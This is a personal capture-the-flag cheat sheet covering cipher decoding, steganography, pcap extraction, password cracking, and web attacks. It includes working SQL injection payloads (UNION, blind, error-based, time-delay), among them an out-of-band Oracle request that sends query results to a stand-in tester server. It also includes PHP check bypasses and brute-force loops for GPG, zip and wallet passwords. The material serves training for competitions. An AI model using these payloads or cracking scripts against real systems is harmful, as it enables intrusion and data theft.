CTF (ultimate) guide
___
To keep motivation and support on CTF competitions
___
This paper is an organized and summarized collection of my personnal notes that I use when I do CTF. 

The ideas that lead to this guide:
- A quick reminder of the methodology and associated commands to be more efficient
- Avoid be distracted on basic challenge that doesn't need real reflexion
- Just need to read Table of Contents to find your way
- Avoid forgeting tricky stuff
- It's a portfolio of ideas to create you're own CTF


This guide is more readable with visual studio code 
___
___

<!-- TOC -->

- [Crypto](#crypto)
    - [Base64](#base64)
        - [Decipher from CLI](#decipher-from-cli)
        - [Decipher from online tool](#decipher-from-online-tool)
    - [Caeser cipher](#caeser-cipher)
        - [Decipher from CLI](#decipher-from-cli-1)
        - [Online Caesar cipher tool](#online-caesar-cipher-tool)
        - [Caesar shifted at each letters](#caesar-shifted-at-each-letters)
            - [Trainning possibilities](#trainning-possibilities)
    - [Substitution Ciphers](#substitution-ciphers)
        - [Frequency analysis](#frequency-analysis)
        - [Substitution tools](#substitution-tools)
            - [Trainning possibilities](#trainning-possibilities-1)
    - [RSA](#rsa)
        - [Case1: You've p,q,c,e](#case1-youve-pqce)
            - [Trainning possibilities](#trainning-possibilities-2)
        - [Case2: You've n,e,c](#case2-youve-nec)
            - [Wiener attack (e is long)](#wiener-attack-e-is-long)
                - [Trainning possibilities](#trainning-possibilities-3)
            - [Else (e is short)](#else-e-is-short)
    - [XOR cipher](#xor-cipher)
        - [XORing 2 strings](#xoring-2-strings)
        - [XORing files](#xoring-files)
    - [Decrypt GPG file](#decrypt gpg-file)
- [Stegano](#stegano)
    - [Basic checks](#basic-checks)
        - [Foremost identification](#foremost-identification)
    - [Check spectrogram (FINISH ME)](#check-spectrogram-finish-me)
    - [Test multiple filters (StegSolve)](#test-multiple-filters-stegsolve)
    - [LSB tools (Finish ME)](#lsb-tools-finish-me)
    - [Twins files: find difference](#twins-files-find-difference)
        - [Trainning possibilities](#trainning-possibilities-4)
    - [Egyptian glyph alphabet](#egyptian-glyph-alphabet)
        - [Trainning possibilities](#trainning-possibilities-5)
    - [Maya numerals](#maya-numerals)
- [Network](#network)
    - [Retrieve image from pcap](#retrieve-image-from-pcap)
- [PWN](#pwn)
    - [python module](#python-module)
    - [(De)Activate ASLR](#deactivate-aslr)
- [Web](#web)
    - [Check list](#check-list)
    - [Common check bypass](#common-check-bypass)
        - [`$_POST['a'] == $_POST['b] && $_POST['b'] !== $_POST['a']`](#_posta--_postb--_postb--_posta)
        - [PhpArray bypass](#phparray-bypass)
    - [SQLI](#sqli)
        - [UNION Exploitation Technique](#union-exploitation-technique)
            - [1. Determine number of columns](#1-determine-number-of-columns)
            - [2. Determine type of columns](#2-determine-type-of-columns)
            - [Tips](#tips)
        - [Boolean Exploitation Technic (BLIND SQL Injection)](#boolean-exploitation-technic-blind-sql-injection)
        - [Error based Exploitation technique](#error-based-exploitation-technique)
        - [Out of Band Exploitation technique](#out-of-band-exploitation-technique)
        - [Time delay Exploitation Technique](#time-delay-exploitation-technique)
        - [Stored procedure injection](#stored-procedure-injection)
    - [SQL automated exploitation](#sql-automated-exploitation)
- [MISC](#misc)
    - [Online QRcode reader](#online-qrcode-reader)
    - [CLI QRcode reader](#cli-qrcode-reader)
    - [Assemble pictures from CLI](#assemble-pictures-from-cli)
    - [DTMF (dial tone multi frequency) audiofile](#dtmf-dial-tone-multi-frequency-audiofile)
            - [Trainning possibilities](#trainning-possibilities-6)
    - [Crack zip file](#crack-zip-file)
        - [Fcrack (easy but slow)](#fcrack-easy-but-slow)
        - [John (hard to setup, faster)](#john-hard-to-setup-faster)
        - [Crack zip file recursively](#crack-zip-file-recursively)
            - [Fcrack version (slow)](#fcrack-version-slow)
            - [JTR version (need the last version of john (because need of zip2john))](#jtr-version-need-the-last-version-of-john-because-need-of-zip2john)
            - [Trainning possibilities](#trainning-possibilities-7)
    - [BrainFUck](#brainfuck)
    - [7 Segment lightcode (Nt FInish)](#7 segment-lightcode-nt-finish)
        - [Trainning possibilities](#trainning-possibilities-8)
    - [Crypto Wallet Password recovery](#crypto-wallet-password-recovery)
        - [Trainning possibilities](#trainning-possibilities-9)
    - [BackUp file](#backup-file)
        - [gedit](#gedit)
- [Wordlist ressouces](#wordlist-ressouces)
    - [All wordlists in the world](#all-wordlists-in-the-world)
    - [Most usefull wordlist](#most-usefull-wordlist)
    - [Magic number list](#magic-number-list)

<!-- /TOC -->

___
___
# Crypto

## Base64
___
### Decipher from CLI
```
echo "CIPHERED TEXT" |base64 -d
```
___
### Decipher from online tool
Could be usefull for file encoded as b64.
```
https://www.base64decode.org/
```
___

## Caeser cipher
___
### Decipher from CLI
```
echo "q4ex{t1g_thq_p4rf4e}p0qr" | tr a-z n-za-m
```
___
### Online Caesar cipher tool
```
http://rumkin.com/tools/cipher/caesar.php
```
___
### Caesar shifted at each letters
If the msg is encoded with caesar cipher and a shift at each letter you can decrypt it with this script
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

alphabet="abcdefghijklmnopqrstuvwxyz"

def decode_rolling_caesar(alphabet, text, shift):
    text = text.lower()
    ciphered_text = ""
    for i in range(len(text)):
        if text[i] not in alphabet:
            ciphered_text += text[i]
        else:
            new_index = (alphabet.index(text[i]) + shift - i) % len(alphabet)
            ciphered_text +=alphabet[new_index]
    print ciphered_text
    return ciphered_text

if __name__== "__main__":

    text= "e4uo{zo1b_1e_f0j4l10i}z0ce"

    for i in range(26):
        decode_rolling_caesar(alphabet, text, i)
```
#### Trainning possibilities
HackCon2018 - Salad upgrade
```
https://ctftime.org/writeup/10742
```
___
## Substitution Ciphers
A common challenge in CTF.
___
### Frequency analysis
To find quickier you can use a frequence analysis tool
```
http://md5decrypt.net/en/Letters-frequency-analysis/
```
This tool also display the frequency of each letter for the specified language.
Else use this tool:
```
http://letterfrequency.org/letter-frequency-by-language/
```
___
### Substitution tools
```
http://rumkin.com/tools/cipher/cryptogram.php#
```

A good thing to have is a crossword solver to help you complete not so obvious word.
```
http://www.the-crossword-solver.com/search
```

#### Trainning possibilities
HackCon2017 - ALL CAPS
```
https://ctftime.org/task/4485
```
___
## RSA
Little reminder
- __p__: prime number 
- __q__: another prime number
- __n__ = p*q (called modulus )
- __e__: public key exponent.
- __d__: private key exponent.
- __c__: ciphered text 
- __private exponent__: (n, d)
- __public exponent__: (n,e)
___
### Case1: You've p,q,c,e
Easiest case, use this little script
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

p = #VALUE
q = #VALUE
c = #VALUe
e = #VALUE

def egcd(a, b):
    if a == 0: return (b, 0, 1)
    g, x, y = egcd(b % a, a)
    return (g, y - (b // a) * x, x)

def mod_inv(a, m):
    g, x, _ = egcd(a, m)
    return (x + m) % m

def crack_rsa(p, q, e, c):
    n = p * q
    phi = (p - 1) * (q - 1)
    d = mod_inv(e, phi)
    m = hex(pow(c, d, n)).rstrip("L")[2:]
    return m.decode("hex")

print(crack_rsa(p, q, e, c))
```

#### Trainning possibilities
HackCon2017 - RSA-1
```
https://ctftime.org/task/4481
```
___
___

### Case2: You've n,e,c 
___
#### Wiener attack (e is long)

If e is big value (more than 5 digits) you can try a Wiener attack.
Most of the time you can't factorise n because it's too big.

You can use the RSHack tool:
```
https://github.com/zweisamkeit/RSHack
```

##### Trainning possibilities
HackCon2017 - RSA-2
```
https://ctftime.org/task/4482
```
___
#### Else (e is short)
Use rsactftool.

Step1: Create a PEM file format for public key
```bash
rsactftool --createpub -n VALUE -e VALUE > key.pub
```
Step2: Extract the private key from the public 
```bash
rsactftool --publickey key.pub --private > key.priv
```
Step3: Extract d from the private key
```bash
rsactftool --dumpkey --key key.priv
```
Step4: Decrypt the message with python
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from binascii import a2b_hex

c=VALUE # Ciphered message
d=VALUE
n=VALUE

message = hex(pow(c,d,n))
print(a2b_hex(message[2:]))
```


## XOR cipher
___
### XORing 2 strings
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

def xor_two_str(a,b):
    xored = []
    for i in range(max(len(a), len(b))):
        xored_value = ord(a[i%len(a)]) ^ ord(b[i%len(b)])
        xored.append(hex(xored_value)[2:])
    return ''.join(xored)

print xor_two_str("12ef","abcd")
```
___
### XORing files
```
https://github.com/hellman/xortool
```
___
## Decrypt GPG file
A little bash script to crack file ciphered with `gpg` command

``` bash
#!/bin/bash

# try all word in words.txt
for word in $(cat wordlist)
do

  # try to decrypt with word
 echo "Testing: $word"
 echo "${word}" | gpg -q --passphrase-fd 0 FILENAME.gpg

  # if decrypt is successfull; stop
  if [ $? -eq 0 ]
  then
    echo "GPG passphrase is: ${word}"
    exit 0
  fi
 echo ""
done
exit 1
```
___
# Stegano

## Basic checks 
- Check the size of the file
- Check the file type (command: `file FILENAME`)
- Check presence of meta data (command: `exiftool FILENAME`)
- Check presence of data into header of the file (`exiftool -b FILENAME`)
- Check magic number 
- Extract all strings from the file (command: `strings FILENAME`)
- Check for hex code (command: `hexdump -C`)

### Foremost identification
Sometime foremost could show you what you've missed
```
formost -a -v iggs.gif 
```

___
## Check spectrogram (FINISH ME)
- Sonic Visualiser Tool  https://www.sonicvisualiser.org/download.html

___
## Test multiple filters (StegSolve)
Use the tool stegsolve to apply differents filter on the image.

___
## LSB tools (Finish ME)
Sometime information is hidden with LSB steganography 
```
https://github.com/RobinDavid/LSB-Steganography
```
___
## Twins files: find difference
Sometime you have to jsut keep the difference between 2 strings / files

```
file1 = open("file1", "r").read()
file2 = open("file2", "r").read()
flag = ""

if len(file1) == len(file2):
    for i in xrange(len(file1)):
        if file1[i] == file2[i]:
            flag = flag + file1[i]

print("Flag : "+flag)
```

### Trainning possibilities
HackCon2018 - Twins
```
https://ctftime.org/task/6442
```
___
## Egyptian glyph alphabet

If you find some egyptian alphabet use this translation:
```
http://www.virtual-egypt.com/newhtml/hieroglyphics/sample/alphabet.gif
```

### Trainning possibilities
HackCon2017 - Caves
```
https://ctftime.org/task/4497
```

## Maya numerals
When you have dot and line.
```
https://en.wikipedia.org/wiki/Maya_numerals
```
# Network
## Retrieve image from pcap
I.E: The file is inside HTTP traffic
Open the file with wirshark
```
File->Export Object->HTTP
```
___
# PWN
## python module 
Should help to develop exploit more quickly
```
https://docs.pwntools.com/en/stable/
```
## (De)Activate ASLR
```
# 0 = Desactivated ASLR
# 1 = Activate
sudo bash -c "echo 1 > /proc/sys/kernel/randomize_va_space"
```
___
# Web
## Check list
- robots.txt
- cookies
- Backup files (specifically DB backup)


## Common check bypass
___
### `$_POST['a'] == $_POST['b] && $_POST['b'] !== $_POST['a']`
If you have such source code, you can by pass with 
```
a = 0
b = 0e1
```
___
### PhpArray bypass
Sometime on some request if you replace the sent value from:
```
password="test"
```

to something like that
```
password[]="test"
```
## SQLI
___
__A good way to test SQLI is to use a webproxy to resend the request.__

### UNION Exploitation Technique

#### 1. Determine number of columns
 
- Use __ORDER BY__:
Repeat until you didn't get error message anymore
```
http://www.example.com/product.php?id=10 ORDER BY 10--
```

#### 2. Determine type of columns
 
- __Integer columns__:
Repeat until you didn't get error message about "same datatype"
```
http://www.example.com/product.php?id=10 UNION SELECT 1,null,null--
```

#### Tips
- Bypass __DISTINC__ restriction
If the query use the keyword "DISTINC" bypass it with "UNION ALL"

___
### Boolean Exploitation Technic (BLIND SQL Injection)
__Blind SQL Injection situation__ > nothing is known on the outcome of an operation.

__Aim: Extract value character by character__
Make use of pseudo function:

- SUBSTRING(text, start, length)
- ASCII(char)
- LENGTH(text)

```
$Id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND '1'='1 
```
___
### Error based Exploitation technique
- When UNION technique can't be used
- Force DB to display data into error message
- DBMS specific

__Oracle 10g example:__
```
http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME( (SELECT user FROM DUAL) )--
```
> Concatenating the value 10 with the result of the function UTL_INADDR.GET_HOST_NAME.

___
### Out of Band Exploitation technique
- Usefull for Blind SQLI
- DBMS specific
- Make the DB deliver the results of the injected query as part of the request to the tester’s server.

__Oracle 10g example:__
```
http://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--
```
> This Oracle function will try to connect to ‘testerserver’ and make a HTTP GET request containing the return from the query “SELECT user FROM DUAL”.

___
### Time delay Exploitation Technique
- Usefull for Blind SQLI
- DBMS specific
- Sending an injected query and in case the conditional is true, monitor the time taken to for the server to respond.

```
http://www.example.com/product.php?id=10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--
```
> Checking whether the MySql version is 5.x 

### Stored procedure injection
- When using dynamic SQL within a stored procedure

__SQL Server Stored Procedure__
```
Create procedure user_login @username varchar(20), @passwd varchar(20) 
As
Declare @sqlstring varchar(250)
Set @sqlstring  = ‘
Select 1 from users
Where username = ‘ + @username + ‘ and passwd = ‘ + @passwd
exec(@sqlstring)
Go
```
User input:
```
anyusername or 1=1'
anypassword
```
> This procedure does not sanitize the input, therefore allowing the return value to show an existing record with these parameters.

___
## SQL automated exploitation
- SQLmap
- SQLNinja

___
# MISC
___
## Online QRcode reader
```
https://webqr.com/
```
___
## CLI QRcode reader
Note that this tools is able to read a picture with multiple qrcode in it.
```
zbarimg <FILENAME>
```

```
# Scan multiple QRcode in 1 img.
# Suppress unwanted value
# Reverse the output
# Remove the newline char

zbarimg 1.png | cut -d ':' -f2 | tac | tr -d "\n"
```
___
## Assemble pictures from CLI
Sometime you need to assemble multiple image to recreate one big image.
To achieve that from CLI
```
montage littleIMG-*.png -tile 6x5 -geometry +0+0 bigOutPutImg.png 
```
___
## DTMF (dial tone multi frequency) audiofile
Sometime you can found this strange file...

- Use this tool to decode the pressed touch into number
```
http://dialabc.com/sound/detect/
```
- Audacity to find positions of gaps
- Use a T9 keypad to make conversion fron number to letter

#### Trainning possibilities
HackCon2017 - Typing isn't fun
```
https://ctftime.org/task/4500
```
___
## Crack zip file
___
### Fcrack (easy but slow)
```
fcrackzip -D -p ../zip/rockyou.txt -u ../zip/zipfile_.zip
```
___
### John (hard to setup, faster)
```bash
zip2john zipfile_$i.zip > hash.txt
john hash.txt --wordlist=/usr/share/seclists/Passwords/rockyou.txt
pass=$(/root/app/JohnTheRipper/run/john hash.txt --show | cut -d: -f2 | head -n 1 )
unzip -P $pass zipfile_$i.zip
```
___
### Crack zip file recursively

__Inspired by the challenge "We Will Rock You - TJCTF 2018"__

Sometime file are zipped recursivly and each one need a password.

#### Fcrack version (slow)
```bash
# May be need to adjust this 500 value
for i in {500..0}
do
    echo "Cracking passwd   Iteration: $i"
    passwd="$(fcrackzip -D -p rockyou.txt -u zipfile_$i.zip |cut -d ' ' -f 5)"
    echo "The password is $passwd"

    echo "Unziping file"
    unzip -P $passwd zipfile_$i
done
```
___
#### JTR version (need the last version of john (because need of zip2john))
```bash
# May be need to adjust this 500 value
for i in {500..1}
do
    zip2john zipfile_$i.zip > hash.txt
    john hash.txt --wordlist=/usr/share/seclists/Passwords/rockyou.txt
    pass=$(/root/app/JohnTheRipper/run/john hash.txt --show | cut -d: -f2 | head -n 1 )
    unzip -P $pass zipfile_$i.zip
    rm zipfile_$i.zip
done
```
#### Trainning possibilities
HackCon2017 - Forgot password
```
https://ctftime.org/task/4501
```
___
## BrainFUck 
Sometime need a brainFUck interpreter
```
https://copy.sh/brainfuck/
```
___
## 7 Segment lightcode (Nt FInish)
__Inspired by the challenge "Light N'Easy - HackCon 2018"__

Sometime you can encounter strange binary code.
- 8 bit long 
- Not ascii

Looks like the following
```
01001110-00100000-00111010
```
This code is used to ligt a 7 segment display.

Each byte is a symbol.

This can using the follwing scheme

```
   b
  ===
a| g |c
  ===
f|   |d
  ===   .h (the dot)
   e
```

### Trainning possibilities
HackCon2018 - Light N' Easy
```
https://ctftime.org/task/6447
```
___
## Crypto Wallet Password recovery

Tool to recover the password of a crypto wallet
```
https://github.com/gurnec/btcrecover
```
```
https://github.com/glv2/bruteforce-wallet
``` 
``` 
bruteforce-wallet -t 6 -f rockyou.txt 9d7e6203fb6e2c14646c63bea94e48001b9317c86bec229c3e063904a168dfad_wallet.dat
``` 

### Trainning possibilities
HackCon2018 - We Will Rock you
```
https://ctftime.org/task/6415
```
___
## BackUp file
___
### gedit
gedit leave backup file with this format name
```
<filename>~

such as 'checker.php~'
```
___
# Wordlist ressouces
___
## All wordlists in the world
```
https://github.com/danielmiessler/SecLists
```
```
https://wiki.skullsecurity.org/Passwords
```
___
## Most usefull wordlist
The so famous __rockyou__
```
https://github.com/danielmiessler/SecLists/blob/5c9217fe8e930c41d128aacdc68cbce7ece96e4f/Passwords/Leaked-Databases/rockyou.txt.tar.gz
```
___
## Magic number list
```
https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5
```